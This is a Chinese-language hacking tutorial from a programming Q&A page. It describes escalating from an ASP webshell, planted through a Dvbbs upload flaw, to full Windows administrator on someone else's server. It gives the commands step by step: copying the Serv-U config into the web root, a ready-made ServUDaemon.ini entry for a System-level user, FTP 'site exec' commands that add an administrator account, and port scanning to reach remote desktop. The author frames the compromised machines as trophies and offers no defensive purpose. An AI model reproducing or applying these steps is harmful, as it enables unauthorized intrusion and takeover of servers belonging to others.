当前位置:编程学习 > asp >>
答案:最近动网得upfile.asp漏洞闹得满城风雨啊~呵呵`~``,大家的手中也多了不少肉鸡。不过都只能用asp木马来操控,黑黑主页,浏览目录,查看系统信息什么的,这些对我们来说都没有吸引力拉,我们每进行一个入侵,都应该想办法拿到系统的管理员权限,不能满足于现状。这样才能提高自己的水平和思路。入侵思路,确实是个很重要的东西!正所谓说:没有做不到,只有想不到嘛!西西````好了。废话不说了,开始拿系统权限吧!
首先,我已经通过动网upfile.asp文件的漏洞给服务器上传了我的asp木马,我这里用的是海洋顶端的,如图:
现在我的asp木马是在D盘下,好的,我们来看看他都有的服务,在CMD命令对话框里输入:net stsart,点击“发送命令”。可以在“发送命令”按钮上面的文本框里看到系统返回的信息:
要生成的文件内容,不可以有回车:已经启动以下 Windows 服务:Application Layer Gateway Service
Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
HTTP SSL
IIS Admin Service
Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
IPSEC Services
Logical Disk Manager
Microsoft Search
MSSQLSERVER
Network Connections
Network Location Awareness (NLA)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Administration Service
Remote Procedure Call (RPC)
Remote Registry
Remote Server Manager
RMServer
Secondary Logon
Security Accounts Manager
Serv-U FTP 服务器
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
Web Element Manager
Windows Audio
Windows Kernel Service
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
World Wide Web Publishing Service命令成功完成。
看到Terminal Services ,大家高兴吧`~呵呵``不用自己开3389了。好的,那我们只要在上面建立一个管理级别的帐号就OK。要建立一个帐号,得有系统管理员得权限啊,那怎么得到这个权限呢?我们再来看系统提供的服务,有一个是:Serv-U FTP 服务器,这是一个很好的,功能很齐全的ftp服务器。我们可以通过他来建立一个管理员帐号。怎么建呢?
首先,我们找到Serv-U FTP 服务器得安装目录,一般是再系统盘得program files文件夹里,我们再asp木马得“输入要浏览的目录,最后要加\” 这里输入:C:\Program Files\Serv-U\ ,这样就可以看到这个文件夹里面得内容拉,看我得截图:
大家看到ServUDaemon.ini,这个文件了吧,SERV-U服务器里面所有得用户都是保存再这个配置文件里面的,我们只要再上面建一个用执行权限的用户不就可以建一个管理员帐号了吗?呵呵```好的,我们先把他的内容copy下来,我们来使用asp木马的第二行,
copy 目的地址不要带文件名
这个功能,在第一个空里输入我们要copy的文件的路径:C:\Program Files\Serv-U\ServUDaemon.ini
,在第二个空里输入我们的目标路径,这个路径要选web的路径,这样我们才能访问嘛```好了以后就点饥“发送命令”。OK。我们来下载这个ini文件,打开URL:http://www.xxxx.net/bbs/ServUDaemon.ini..
“无法找到该页,,我晕`~~~~看来已经做了限制了,,copy是不行了啊`~``
那我们就直接查看ServUDaemon.ini的里面好了,在
CMD命令对话框
里输入:type C:\Program Files\Serv-U\ServUDaemon.ini ,回车。晕```还是不行,…………想了一会以后,又找到个方法:输入:type C:\"Program Files"\Serv-U\ServUAdmin.ini>d:\xxxx\bbs\ ServUAdmin.txt,打开http://www.xxxx.net/bbs/ServUDaemon.txt,哈哈```看到里面的内容拉``copy下来,另存为ServUDaemon.ini,在这里要说明一下,在这个文件里添加一个用户的格式,我们先来看看他的格式内容:[GLOBAL]
Version=5.0.0.11
[DOMAINS]
Domain1=192.168.1.2||21|MY FTP|1|0|0
[Domain1]
User1=admin|1|0
User2=pchoer|1|0
[USER=pchoer|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
SKEYValues=
[USER=admin|1]
Password=ke7287F26ABDFEB5C5BFA9180F4A3C1AC5
HomeDir=e:\
TimeOut=600
Maintenance=System
Access1=E:\|RWAMELCDP
SKEYValues=
在[Domain1] 下面,就是这个域服务器上的帐号,一共有2个,再往下看,就是用户的信息,我们来看第一个用户:[USER=pchoer|1],访问的目录,密码,权限,连接超时时间等一些信息,首先我们说一下密码,因为在SERV-U服务器里面,他用的是加密,如果我们在这里加了密码以后,覆盖ServUDaemon.ini以后,是不可识别的,所以,我们选择了空密码,其实大家只要把帐号设置复杂一点,一样不怕别人用暴力猜解的。HomeDir=e:\是我们这个帐号的访问目录,这里我设置的是:c:\winnt\system32,TimeOut=600
是超时时间,随便设置。Maintenance=System 说明我们具体的时系统的管理员权限,Access1=E:\|RWAMELCDP 这里设置了我们具体全部的权限,如:查看,删除,执行等等。我在这里设置好了一份,大家只要直接添加就可以了:
[USER=pchoer888|1]
Password=
HomeDir=c:\winnt\system32
TimeOut=600
Maintenance=System
Access1=c:\winnt\system32|RWAMELCDP
SKEYValues=
我们只要在
[Domain1]
User1=admin|1|0
User2=pchoer|1|0
后面再加上一个
User3=pchoer|1|0
然后把配置的信息再加到任意一个帐号的配置信息后面就可以了,如:
[GLOBAL]
Version=5.0.0.11
[DOMAINS]
Domain1=192.168.1.2||21|MY FTP|1|0|0
[Domain1]
User1=admin|1|0
User2=pchoer|1|0
User3=pchoer888|1|0
[USER=pchoer|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
SKEYValues=
[USER=admin|1]
Password=ke7287F26ABDFEB5C5BFA9180F4A3C1AC5
HomeDir=e:\
TimeOut=600
Maintenance=System
Access1=E:\|RWAMELCDP
SKEYValues=
[USER=pchoer888|1]
Password=
HomeDir=c:\winnt\system32
TimeOut=600
Maintenance=System
Access1=c:\winnt\system32|RWAMELCDP
SKEYValues=
然后保存。再打开我们的asp木马,传至服务器已有目录: 文件地址: 〖绝对路径〗 选择服务器上的 SERV-U服务器的路径:C:\Program Files\Serv-U\ServUDaemon.ini,然后上传我们刚刚修改好的ServUDaemon.ini文件,再这里要保持ServUDaemon.ini文件名的一致,要不就覆盖不了了。好的``上传成功以后呢?我们就具体一个管理员的ftp帐号了,打开命令提示符,ftp xx.xxx.119.193
输入用户和密码以后,执行:quote site exec net user pchoer password /add 和quote site exec net localgroup administrators pchoer /add 来添加一个用户名是:pchoer,密码是:password的系统管理员,如图:执行命令以后,看到200 EXEC command successful (TID=33).,嘿嘿```就代表我们已经建立成功了``呵呵```好的``打开我们的3389连接器,输入IP,连接,“客户端无法连接到远程计算机”,晕哦````难道改了端口???来看看,
CMD命令对话框
输入:netstat –an,查看一下端口,晕``没有看到3389,看来这个家伙是改了端口的拉```好的,
没有办法来,只要按这他打开的TCP端口一个一个的来试拉```最后,总于找到了,出现了我们熟悉的画面,输入我们刚刚建立的用户和密码,确定。呵呵```登陆上了!好了,到这里,我由asp木马获得系统权限的过程也已经完成。在整个的过程中,思路是很重要的一步,按照每一步来实现一个个目标,到最后取得系统权限。提醒大家,在入侵的时候,不要跟着别人的思路走,要有自己的思路。理清思路,往往是事半功倍!!
上一个:IIS不支持ASP的解决办法
下一个:图片asp木马
- 更多asp疑问解答:
- asp正则过滤重复字符串的代码
- 用asp过滤全部html但保留br类似的符号
- 会asp,但感觉asp要过点,想学php。但我一般做的都是小公司的站,用access数
- PHP的空间可以用ASP的源代码吗?
- 以前做asp程序,现在应该怎样发展?是学.net还是php
- 以前做asp程序,现在应该怎样发展?是学.net还是php
- 想做一个市级的人才网acess,sql数据库,语言asp,jsp,php分别用哪种好
- jsp,asp,php 区别
- 我想找一个有比较多漏洞的网站的源码,比如可以asp,php注入等都可以。供学习研究用。请提供下载地址。。
- 现在候找人做个网站,用ASP,还是PHP语言去做好
- asp,php ,jsp,.net 对于做网站前台的重要吗?
- asp和php的区别是什么?
- 我是新手SEO菜鸟 请问wp dw php asp cms myspl dede 这些软件应该如何区分呀?
- 网页制作相关的三种语言:ASP JSP PHP那个好点,简单点?
- 网页制作相关的三种语言:ASP JSP PHP那个好点,简单点?